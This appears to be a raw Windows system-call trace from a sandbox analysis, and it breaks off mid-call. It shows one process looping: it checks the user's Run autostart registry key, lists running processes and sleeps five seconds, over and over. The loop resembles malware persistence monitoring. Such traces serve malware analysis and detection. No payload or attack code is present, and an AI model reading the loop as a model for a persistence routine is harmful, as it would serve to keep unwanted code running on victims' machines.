[0178.262] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.262] NtClose (Handle=0x154) returned 0x0 [0178.262] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.265] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.267] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.268] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.277] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.277] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.277] NtClose (Handle=0x154) returned 0x0 [0178.277] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.278] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.278] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.279] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.281] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.282] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.294] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.294] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.294] NtClose (Handle=0x154) returned 0x0 [0178.294] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.295] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.299] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.299] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.308] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.308] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.309] NtClose (Handle=0x154) returned 0x0 [0178.309] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.310] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.310] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.312] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.313] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.325] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.325] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.325] NtClose (Handle=0x154) returned 0x0 [0178.325] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.326] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.326] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.326] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.329] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.329] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.339] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.340] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.340] NtClose (Handle=0x154) returned 0x0 [0178.340] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.340] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.340] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.341] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.341] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.345] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.345] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.355] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.355] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.355] NtClose (Handle=0x154) returned 0x0 [0178.355] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.356] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.356] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.357] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.359] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.360] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.386] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.387] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.387] NtClose (Handle=0x154) returned 0x0 [0178.387] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.388] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.388] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.390] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.390] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.404] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.404] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.404] NtClose (Handle=0x154) returned 0x0 [0178.404] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.405] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.406] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.408] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.411] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.419] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.419] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.419] NtClose (Handle=0x154) returned 0x0 [0178.419] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.419] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.420] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.420] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.435] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.436] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.449] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.449] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.449] NtClose (Handle=0x154) returned 0x0 [0178.450] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.450] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.451] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.453] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.453] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.464] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.464] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.464] NtClose (Handle=0x154) returned 0x0 [0178.465] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.465] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.465] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.466] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.468] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.469] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.480] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.480] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.480] NtClose (Handle=0x154) returned 0x0 [0178.481] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.484] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.484] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.485] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.485] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.487] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.487] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.496] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.496] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.496] NtClose (Handle=0x154) returned 0x0 [0178.496] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.497] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.498] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.498] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, 